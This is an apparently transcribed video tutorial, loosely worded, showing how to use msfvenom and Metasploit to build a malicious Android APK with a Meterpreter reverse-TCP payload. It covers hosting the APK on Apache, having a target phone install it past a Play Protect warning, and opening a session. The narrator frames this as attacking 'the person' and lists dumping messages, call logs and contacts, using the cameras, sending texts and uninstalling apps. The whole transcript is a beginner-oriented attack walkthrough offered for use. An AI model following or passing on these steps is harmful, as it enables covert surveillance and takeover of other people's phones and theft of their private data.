first video. This video is completely based on MS of Venom Metasploit framework. By using Metasploit framework, we will send a malicious payload to the person, and we will gather information by sending an APK to that mobile. In what way we can send an APK to that mobile is just we can use the IP address and we can send that APK to that file. By now I am showing how to do that, and for you have to do it with the root access. For that enter sudo su, enter password. Now type this command msf venom. By this command we can create a APK with malicious payload. Meterpreter, reverse TCP. Now we have to see for the L host, that means your IP, because you will get the information, total information of that person from this IP. So we should be so particular about entering our IP. Let's check for IP. To get IP address of your machine, you have to type ifconfig, then it displays your IP address. Now copy that IP and paste it here. Copy that IP, paste it here. Now we have to set L port. I am using 4 ports for this, and reverse TCP, so R greater than. Now we have to locate the folder for that, where www.html oblique we have to specify the name of the APK. I'm keeping first. You can use your name or whatever you want. Sorry, I'm using Emperor. APK. Click enter. Now MSF Venom will make an malicious APK. It takes time up to 30 seconds. Till that I will give a quick overview. By this we can get a lot of information, like we can send message, we can gather call logs, we can dump everything, messages, call logs, messages, contacts, everything we can dump, and we can take screenshots of the user. We can use selfie cam or rear cam, and we can execute so many commands. We can set a query on this. We can modify the system settings, and we can do many things with this. I'm making this video so simple that even beginner can do it in an easy way. Follow my commands properly and you will get this thing. And I'm using Parrot Security OS for this. For this you should use root access. Without root access you cannot create this kind of thing, or you cannot make attack. Again, what we have to do it in the Metasploit framework. We should use some commands to get access to that machine, and we need a mobile phone so that we can get information. See, we have made our APK. Now we have to enter into Metasploit framework. Before that we have to start our Apache server. Without Apache server we cannot send in that IP, won't work. So for that service Apache to start. Sorry, I did a mistake. Service should not give a gap. Apache to start. Now Apache server has been started. We have to check whether it has started or not. For that we have to use the command status. See, we can see active running on top. Now we get back to this terminal, type MSF console. Now Metasploit framework will start running here. Give it some time to load Metasploit framework because it is a huge software. It takes some time to start. MSF console is running here. We can see starting the Metasploit framework console. We can see here. One more thing I have to say, that without using Apache server you cannot do this activity. While doing this thing, you should keep in mind that we should start Apache server. Without that you cannot access APK from that specific IP. I will show you how to download that APK from IP also. See, we have opened MSF console here. Metasploit framework has been started. Now using some commands we can access that Android mobile. Use multi/handler. Type this command, click enter. Now we have to set ports. Set payload on Android, Meterpreter and reverse TCP. Reverse TCP. Reverse TCP. Click enter. Now we will start by setting lhost and lport here. First we should go for lhost. Type that IP here. I forgot what I have to see. Let's see for the IP. Okay, it is 105. No need to worry, this is not my original IP. You can get it out that my IP is got published, but this is my temporary IP. This is in VirtualBox, so no need to worry. We have set lport for 4444. We have set it for 4444. Type it here, and now just what you want to do is exploit. Now just type the command exploit here. I am showing you what to do in the mobile phone also. Now after typing exploit, the TCP handler will start. Now just type the IP here. Now just type the here and type the IP here. 192.0.0.5/emperor.apk. Click enter. See, we have downloaded it just in KB. No need to worry about the size. Just now install it. If you install and click on it, you will the session will start here. Now just install it. No need to worry. Google Play Protect won't stop it here. Stop it. Won't we can install it. See, Play Protect is stopping it here. No problem, we can install it anyway. And when we got here, our Meterpreter session has started. Our TCP handler started working here. Let's see for the background activities. We got 3 sessions here. Now the recent session is 3, so I'm going for session 3. For that session ID 3 we have to type it here. Sorry, I did a mistake. Sessions we have to type. I did a mistake. I just type session only. So click enter. Now type help for commands that we can execute here. See, we can see here a list of commands to execute. Now let's try for something that I want to show you. Let's type app list to see the list of apps in that mobile phone. Just take some time to load. Don't worry. Okay, we got here. These are the list of apps in that mobile phone and the package running iOS system. You can see everything here. These are the list of apps in that mobile phone. App uninstall. By using this command we can uninstall an app, but for that you have to use the package name. Without package name you cannot uninstall an app from that mobile. I will show some cool commands. Some more cool commands. One more thing, we can send message from that mobile also by typing command right in here. I will show some package name here. I will show you something. I think I can start backend activity. App run background app run. We have to type. Sorry, we have to type that package name here. I am pasting it here. Package name. Click enter. The background session in that mobile phone will start now by typing this command. So guys, previously you have seen those many things you can do with this Meterpreter session using Metasploit framework by creating malicious payload. So hope you like this video. The session has died. So that's it for this video guys. Please like, share and subscribe to my channel for more interesting videos like this. Please comment down for more videos like this. So please kindly like, share and subscribe to my videos guys. Thank you.